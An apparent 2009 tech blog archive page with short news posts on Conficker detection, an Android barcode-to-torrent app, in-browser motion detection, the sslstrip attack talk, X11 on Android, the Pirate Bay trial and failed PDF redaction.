Containing Conficker

March 30, 2009 by Eliot 50 Comments

conficker

With all the noise about Conficker turning your computer into liquid hot magma on April 1st, there’s actually some positive news. Researchers from the HoneyNet Project have been following the worm since infections started in late 2008. They recently discovered an easy way to identify infected systems remotely. Conficker attempts to patch the MS08-067 vulnerability during infection. A flaw in the patch causes the machine to respond differently than both an unpatched system and an officially patched system. Using this knowledge, the team developed a proof of concept network scanner in python to find infected machines. You can find it in [Rich Mogull]’s initial post. [Dan Kaminisky] has packaged it as an EXE and has instructions for how to build the SVN version of Nmap, which includes the new signature. Other network scanner vendors are adding the code as well.

In conjunction with this detection code, the team has also released the whitepaper Know Your Enemy: Containing Conficker. It discusses ways to detect, contain, and remove Conficker. They’ve combined this with a tool release that covers Conficker’s dynamic domain generation among other things.

Android App Scans Barcodes, Downloads Torrents

March 11, 2009 by Eliot 27 Comments

[youtube=http://www.youtube.com/watch?v=h05KrEjHW6g]

AndroidAndMe is running a bounty program for Android applications. Users can request a specific application and pledge money to be awarded to the developer who delivers the functional app. [Alec Holmes] just fulfilled the first request by creating Torrent Droid. You can use the app to scan media barcodes and then download the related torrent. It uses the phone’s camera to capture the product’s UPC barcode (similar to Compare Everywhere‘s price lookup) and then searches major torrent sites like The Pirate Bay to find a copy that can be downloaded. After getting the .torrent file, the app can submit it to uTorrent‘s web interface for remote downloading. The app will be released later this month and you can see a screenshot tour of it on Alec’s blog. It’s doubtful that an application like this would ever clear Apple’s App Store approval process.

[via TorrentFreak]

Remote Image Processing In JavaScript

March 7, 2009 by Eliot 2 Comments

[youtube=http://www.youtube.com/watch?v=u3_cFel26J8]

[Tom] wrote in to tell us about his JavaScript project for motion detection. It ties together two ideas we’ve talked about recently. The first is doing image processing in-browser using Canvas(), which we’ve seen employed in captcha breaking. The second is offloading heavy processing to browsers, which we saw recently in the MapReduce implementation. [Tom] is using JavaScript to compare consecutive images to determine if there’s any motion. He did this as part of MJPG-Streamer, a program for streaming images from webcams. It can run on very limited hardware, but image processing can be very intensive. Doing the image processing in-browser makes up for this limitation and means that a custom client program doesn’t have to be written. You can find the code here and a PDF about the proof of concept.

Sslstrip, Hijacking SSL In Network

February 23, 2009 by Eliot 21 Comments

Last week at Black Hat DC, [Moxie Marlinspike] presented a novel way to hijack SSL. You can read about it in this Forbes article, but we highly recommend you watch the video. sslstrip can rewrite all https links as http, but it goes far beyond that. Using unicode characters that look similar to / and ? it can construct URLs with a valid certificate and then redirect the user to the original site after stealing their credentials. The attack can be very difficult for even above average users to notice. This attack requires access to the client’s network, but [Moxie] successfully ran it on a Tor exit node.

X11 On Android

February 22, 2009 by Eliot 18 Comments

x11

[ghostwalker] has put together instructions for running X11 on your Android device. This means you can run a full-blown Linux desktop environment on your phone. It requires you to already have a Debian shell on the phone, which we covered earlier. Instead of having to come up with a custom display driver, it’s hooked to a VNC server. You can connect to it using an Android VNC viewer on the phone or via any other VNC client. The how-to suggests either IceWM or the even lighter-weight LXDE for a window manager. You could potentially install Gnome or KDE, but we’d be surprised if it was any faster than dog slow. Let us know if you have any success with this and what you think the best use is.

Pirate Bay Trial Starts

February 16, 2009 by Eliot 41 Comments

piratebay

The first day of The Pirate Bay’s trial has concluded. The prosecution, representing many large media companies, is attempting to prove that the defendants are directly responsible for copyright infringement. The members of The Pirate Bay are treating the trial as a reality TV farce. From TorrentFreak’s coverage, it sounds like it’s off to a great start: “For several minutes, listeners of the live audio could hear mouse-clicks as Roswall [the prosecutor -Ed.], who earlier claimed to be an expert on computer crimes, tried to get his PowerPoint presentation on the screen.”

[via Waxy]

PDF Redaction Still Not Working

February 12, 2009 by Eliot 20 Comments

Facebook’s internal valuation was revealed this week thanks to shoddy PDF redaction. Court documents from a settlement between Facebook and ConnectU showed that Facebook values itself at $3.7 billion, much less than the $15 billion that was speculated during the Microsoft investment. The AP uncovered this by cutting and pasting from the redacted court document. It’s the same thing we showed in our PDF redaction screencast last summer… and it will never cease to be funny.

[photo: Bryan Veloso]